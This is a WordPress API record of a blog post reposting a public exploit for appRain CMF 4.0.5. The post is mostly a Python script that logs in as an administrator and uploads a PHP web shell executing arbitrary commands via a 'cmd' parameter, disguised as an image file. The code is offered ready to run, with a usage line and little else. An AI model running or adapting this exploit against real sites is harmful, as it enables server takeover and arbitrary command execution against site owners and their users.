{"id":57229,"date":"2024-06-03T18:49:39","date_gmt":"2024-06-03T15:49:39","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178895\/appraincmf405-shell.txt"},"modified":"2024-06-03T18:49:39","modified_gmt":"2024-06-03T15:49:39","slug":"apprain-cmf-4-0-5-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/apprain-cmf-4-0-5-shell-upload\/","title":{"rendered":"appRain CMF 4.0.5 Shell Upload"},"content":{"rendered":"<p># Exploit Title: appRain CMF 4.0.5 &#8211; Remote Code Execution (RCE) (Authenticated)<br \/># Date: 04\/28\/2024<br \/># Exploit Author: Ahmet \u00dcmit BAYRAM<br \/># Vendor Homepage: https:\/\/www.apprain.org<br \/># Software Link:<br \/>https:\/\/github.com\/apprain\/apprain\/archive\/refs\/tags\/v4.0.5.zip<br \/># Version: latest<br \/># Tested on: MacOS<\/p>\n<p>import requests<br \/>import sys<br \/>import time<br \/>import random<br \/>import string<\/p>\n<p>def generate_filename():<br \/>&#8220;&#8221;&#8221; Generate a 5-character random string for filename. &#8220;&#8221;&#8221;<br \/>return &#8221;.join(random.choices(string.ascii_lowercase, k=5)) + &#8220;.inc&#8221;<\/p>\n<p>def login(site, username, password):<br \/>print(&#8220;Logging in&#8230;&#8221;)<br \/>time.sleep(2)<br \/>login_url = f&#8221;https:\/\/{site}\/admin\/system&#8221;<br \/>session = requests.Session()<br \/>login_data = {<br \/>&#8216;data[Admin][admin_id]&#8217;: username,<br \/>&#8216;data[Admin][admin_password]&#8217;: password<br \/>}<br \/>headers = {<br \/>&#8216;Content-Type&#8217;: &#8216;application\/x-www-form-urlencoded&#8217;<br \/>}<br \/>response = session.post(login_url, data=login_data, headers=headers)<br \/>if &#8220;Logout&#8221; in response.text:<br \/>print(&#8220;Login Successful!&#8221;)<br \/>return session<br \/>else:<br \/>print(&#8220;Login Failed!&#8221;)<br \/>sys.exit()<\/p>\n<p>def upload_shell(session, site):<br \/>print(&#8220;Shell preparing&#8230;&#8221;)<br \/>time.sleep(2)<br \/>filename = generate_filename()<br \/>upload_url = f&#8221;https:\/\/{site}\/admin\/filemanager\/upload&#8221;<br \/>files = {<br \/>&#8216;data[filemanager][image]&#8217;: (filename, &#8220;&lt;html&gt;&lt;body&gt;&lt;form method=&#8217;GET&#8217;<br \/>name='&lt;?php echo basename($_SERVER[&#8216;PHP_SELF&#8217;]); ?&gt;&#8217;&gt;&lt;input type=&#8217;TEXT&#8217;<br \/>name=&#8217;cmd&#8217; autofocus id=&#8217;cmd&#8217; size=&#8217;80&#8217;&gt;&lt;input type=&#8217;SUBMIT&#8217;<br \/>value=&#8217;Execute&#8217;&gt;&lt;\/form&gt;&lt;pre&gt;&lt;?php if(isset($_GET[&#8216;cmd&#8217;])){<br \/>system($_GET[&#8216;cmd&#8217;]); } ?&gt;&lt;\/pre&gt;&lt;\/body&gt;&lt;\/html&gt;&#8221;, &#8216;image\/jpeg&#8217;)<br \/>}<br \/>data = {<br \/>&#8216;submit&#8217;: &#8216;Upload&#8217;<br \/>}<br \/>response = session.post(upload_url, files=files, data=data)<br \/>if response.status_code == 200 and &#8220;uploaded successfully&#8221; in response.text:<br \/>print(f&#8221;Your Shell is Ready: https:\/\/{site}\/uploads\/filemanager\/{filename}&#8221;)<br \/>else:<br \/>print(&#8220;Exploit Failed!&#8221;)<br \/>sys.exit()<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>print(&#8220;Exploiting&#8230;&#8221;)<br \/>time.sleep(2)<br \/>if len(sys.argv) != 4:<br \/>print(&#8220;Usage: python exploit.py sitename.com username password&#8221;)<br \/>sys.exit()<br \/>site = sys.argv[1]username = sys.argv[2]password = sys.argv[3]session = login(site, username, password)<br \/>upload_shell(session, site)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: appRain CMF 4.0.5 &#8211; Remote Code Execution (RCE) (Authenticated)# Date: 04\/28\/2024# Exploit Author: Ahmet \u00dcmit BAYRAM# Vendor Homepage: https:\/\/www.apprain.org# Software Link:https:\/\/github.com\/apprain\/apprain\/archive\/refs\/tags\/v4.0.5.zip# Version: latest# Tested on: MacOS import requestsimport sysimport timeimport randomimport string def generate_filename():&#8220;&#8221;&#8221; Generate a 5-character random string for filename. &#8220;&#8221;&#8221;return &#8221;.join(random.choices(string.ascii_lowercase, k=5)) + &#8220;.inc&#8221; def login(site, username, password):print(&#8220;Logging in&#8230;&#8221;)time.sleep(2)login_url = &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57229","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57229","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57229"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57229\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57229"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57229"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57229"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}